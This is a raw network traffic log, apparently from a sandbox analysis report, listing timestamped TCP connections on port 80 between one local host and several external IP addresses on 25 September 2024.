                                                                                  Sep 25, 2024 09:58:16.112647057 CEST4981080192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:16.283674002 CEST8049810137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:16.283852100 CEST4981080192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:16.291539907 CEST4981080192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:16.462416887 CEST8049810137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:16.462749004 CEST8049810137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:16.462855101 CEST8049810137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:16.462987900 CEST4981080192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:16.462996006 CEST8049810137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:16.463010073 CEST8049810137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:16.463141918 CEST4981080192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:16.463202000 CEST8049810137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:16.463342905 CEST4981080192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:17.799271107 CEST4981080192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:18.817073107 CEST4981180192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:18.987823009 CEST8049811137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:18.987993956 CEST4981180192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:18.996514082 CEST4981180192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:19.167196989 CEST8049811137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:19.167783976 CEST8049811137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:19.167893887 CEST8049811137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:19.168009043 CEST8049811137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:19.168050051 CEST8049811137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:19.168051958 CEST4981180192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:19.168220997 CEST4981180192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:19.168276072 CEST8049811137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:19.168428898 CEST4981180192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:20.501796007 CEST4981180192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:21.519745111 CEST4981280192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:21.686836958 CEST8049812137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:21.687083006 CEST4981280192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:21.694941998 CEST4981280192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:21.695010900 CEST4981280192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:21.695055008 CEST4981280192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:21.861999035 CEST8049812137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:21.862126112 CEST8049812137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:21.862247944 CEST8049812137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:21.862345934 CEST8049812137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:21.862360954 CEST8049812137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:21.862380981 CEST8049812137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:21.862665892 CEST8049812137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:21.862672091 CEST4981280192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:21.862694979 CEST8049812137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:21.862828970 CEST4981280192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:21.862937927 CEST8049812137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:21.862952948 CEST8049812137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:21.862968922 CEST8049812137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:21.862971067 CEST4981280192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:21.863140106 CEST4981280192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:23.204324007 CEST4981280192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:24.221991062 CEST4981380192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:24.392263889 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.392410994 CEST4981380192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:24.398310900 CEST4981380192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:24.568451881 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.568648100 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.568845034 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.568955898 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.568973064 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.569160938 CEST4981380192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:24.569210052 CEST4981380192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:24.569760084 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.569873095 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.570086002 CEST4981380192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:24.570997000 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.571106911 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.571293116 CEST4981380192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:24.571369886 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.571496010 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.571805000 CEST4981380192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:24.739607096 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.739754915 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.739866018 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.739881992 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.739924908 CEST4981380192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:24.740120888 CEST4981380192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:24.740317106 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:24.740633965 CEST4981380192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:24.742902040 CEST4981380192.168.11.20137.175.33.56
                                                                                  Sep 25, 2024 09:58:24.912970066 CEST8049813137.175.33.56192.168.11.20
                                                                                  Sep 25, 2024 09:58:29.866286039 CEST4981480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:29.968583107 CEST80498143.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:29.968761921 CEST4981480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:29.977009058 CEST4981480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:30.078936100 CEST80498143.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:30.081104040 CEST80498143.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:30.081269026 CEST4981480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:31.483804941 CEST4981480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:31.585572958 CEST80498143.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:32.501359940 CEST4981580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:32.603269100 CEST80498153.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:32.603660107 CEST4981580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:32.611330032 CEST4981580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:32.713131905 CEST80498153.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:32.715055943 CEST80498153.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:32.715270996 CEST4981580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:34.123816013 CEST4981580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:34.225609064 CEST80498153.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:35.141408920 CEST4981680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:35.243230104 CEST80498163.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:35.243367910 CEST4981680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:35.251199961 CEST4981680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:35.251262903 CEST4981680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:35.251281023 CEST4981680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:35.353212118 CEST80498163.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:35.353223085 CEST80498163.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:35.353305101 CEST80498163.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:35.353313923 CEST80498163.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:35.353322029 CEST80498163.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:35.353512049 CEST80498163.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:35.353521109 CEST80498163.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:35.354995966 CEST80498163.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:35.355170012 CEST4981680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:36.763823032 CEST4981680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:36.865844965 CEST80498163.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:37.781486988 CEST4981780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:37.884008884 CEST80498173.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:37.884155035 CEST4981780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:37.889362097 CEST4981780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:37.991323948 CEST80498173.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:37.994091988 CEST80498173.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:37.994105101 CEST80498173.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:37.994308949 CEST4981780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:37.996263981 CEST4981780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:38.001308918 CEST80498173.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:38.001487017 CEST4981780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:58:38.097986937 CEST80498173.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.070652962 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:46.204813957 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.205009937 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:46.210294962 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:46.398066044 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.820354939 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.820379972 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.820400953 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.820420980 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.820451975 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.820589066 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.820615053 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.820635080 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.820653915 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.820672989 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.820693016 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.820725918 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:46.820725918 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:46.821044922 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:46.821044922 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:46.870934010 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:46.961004972 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.961039066 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.961111069 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.961122990 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.961133957 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.961148024 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.961206913 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.961219072 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.961323977 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.961389065 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:46.961389065 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:46.961389065 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:46.961415052 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.961464882 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.961476088 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.961487055 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.961498022 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:46.961704016 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:46.961704016 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:46.961704016 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:47.010946989 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:47.010962963 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:47.011240959 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:47.011240959 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:47.101413965 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:47.101537943 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:47.101551056 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:47.101566076 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:47.101650000 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:47.101665020 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:47.101794958 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:47.101794958 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:47.101869106 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:47.101938009 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:47.102052927 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:47.102066994 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:47.102125883 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:47.102206945 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:47.102236986 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:47.102274895 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:47.102303982 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:47.102334976 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:47.102391958 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:47.102554083 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:47.102554083 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:47.104497910 CEST4981880192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:58:47.238516092 CEST8049818208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:58:52.122124910 CEST4981980192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:58:52.225935936 CEST804981913.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:58:52.226100922 CEST4981980192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:58:52.233793974 CEST4981980192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:58:52.336788893 CEST804981913.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:58:52.337300062 CEST804981913.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:58:52.337541103 CEST4981980192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:58:53.744513035 CEST4981980192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:58:53.847387075 CEST804981913.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:58:54.762108088 CEST4982080192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:58:54.873838902 CEST804982013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:58:54.874088049 CEST4982080192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:58:54.881755114 CEST4982080192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:58:54.985240936 CEST804982013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:58:54.985570908 CEST804982013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:58:54.985749006 CEST4982080192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:58:56.384572983 CEST4982080192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:58:56.488123894 CEST804982013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:58:57.402086973 CEST4982180192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:58:57.507452011 CEST804982113.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:58:57.507632971 CEST4982180192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:58:57.515466928 CEST4982180192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:58:57.515521049 CEST4982180192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:58:57.619631052 CEST804982113.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:58:57.619740009 CEST804982113.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:58:57.619751930 CEST804982113.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:58:57.620317936 CEST804982113.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:59:00.042210102 CEST4982280192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:59:00.150300026 CEST804982213.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:59:00.150501966 CEST4982280192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:59:00.155721903 CEST4982280192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:59:00.258898973 CEST804982213.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:59:00.261560917 CEST804982213.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:59:00.261665106 CEST804982213.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:59:00.261874914 CEST4982280192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:59:00.263890028 CEST4982280192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:59:00.367007017 CEST804982213.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:59:05.275424004 CEST4982380192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:05.377259970 CEST80498233.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:05.377423048 CEST4982380192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:05.385103941 CEST4982380192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:05.486989975 CEST80498233.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:06.897842884 CEST4982380192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:07.042920113 CEST80498233.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:07.915704966 CEST4982480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:08.017730951 CEST80498243.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:08.017957926 CEST4982480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:08.025620937 CEST4982480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:08.127935886 CEST80498243.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:09.034054041 CEST80498243.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:09.034291029 CEST4982480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:09.537868977 CEST4982480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:09.639703989 CEST80498243.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:10.555737972 CEST4982580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:10.657533884 CEST80498253.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:10.657715082 CEST4982580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:10.665514946 CEST4982580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:10.665601015 CEST4982580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:10.767529964 CEST80498253.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:10.767559052 CEST80498253.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:10.767611027 CEST80498253.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:10.767843962 CEST80498253.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:10.767995119 CEST80498253.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:10.768022060 CEST80498253.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:10.768042088 CEST80498253.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:10.769315958 CEST80498253.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:10.769541025 CEST4982580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:12.177884102 CEST4982580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:12.279786110 CEST80498253.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:12.512921095 CEST80498233.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:12.513180971 CEST4982380192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:13.195539951 CEST4982680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:13.297467947 CEST80498263.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:13.297666073 CEST4982680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:13.302844048 CEST4982680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:13.404808998 CEST80498263.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:13.409317017 CEST80498263.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:13.409343958 CEST80498263.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:13.409676075 CEST4982680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:13.411756039 CEST4982680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:13.413798094 CEST80498263.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:13.413906097 CEST4982680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:13.513504982 CEST80498263.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:18.428811073 CEST4982780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:18.530869007 CEST80498273.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:18.531099081 CEST4982780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:18.538786888 CEST4982780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:18.640675068 CEST80498273.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:18.642303944 CEST80498273.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:18.642540932 CEST4982780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:20.051211119 CEST4982780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:20.153021097 CEST80498273.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:21.068806887 CEST4982880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:21.170692921 CEST80498283.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:21.173469067 CEST4982880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:21.178606033 CEST4982880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:21.280580997 CEST80498283.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:21.282506943 CEST80498283.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:21.282686949 CEST4982880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:22.691201925 CEST4982880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:22.792951107 CEST80498283.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.709062099 CEST4982980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:23.811031103 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.811191082 CEST4982980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:23.818974018 CEST4982980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:23.819021940 CEST4982980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:23.819073915 CEST4982980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:23.921127081 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.921138048 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.921149015 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.921156883 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.921164989 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.921173096 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.921180964 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.922590971 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:23.922771931 CEST4982980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:25.331268072 CEST4982980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:25.432961941 CEST80498293.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:26.348918915 CEST4983080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:26.450766087 CEST80498303.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:26.450974941 CEST4983080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:26.456190109 CEST4983080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:26.558038950 CEST80498303.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:29.490098953 CEST80498303.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:29.490113974 CEST80498303.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:29.490423918 CEST4983080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:29.492616892 CEST4983080192.168.11.203.33.130.190
